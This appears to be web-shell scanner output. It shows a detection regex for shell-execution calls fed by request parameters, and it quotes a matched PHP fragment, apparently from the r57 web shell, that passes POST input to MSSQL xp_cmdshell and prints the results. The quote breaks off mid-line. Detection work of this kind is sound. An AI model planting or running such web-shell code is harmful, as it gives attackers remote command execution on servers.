Detected 2 occurrence(s) of ‘\s+(system|popen|shellexec|exec).*\$(_GET|_POST|_COOKIE|_REQUEST|HTTP_POST_VARS)’: if($db) { if(@mssql_select_db($_POST['test4_md'],$db)) { @mssql_query("drop table r57_temp_table",$db); @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db); $res = mssql_query("select * from r57_temp_table",$db); while(($row=@mssql_fetch_row($res))) { echo $row[0]."\r\n"; } @mssql_query("drop table r57_temp_table",$db); } else echo "[-] E Source: http://pastebin.com/raw.php?i=HFvJQD9Z
↧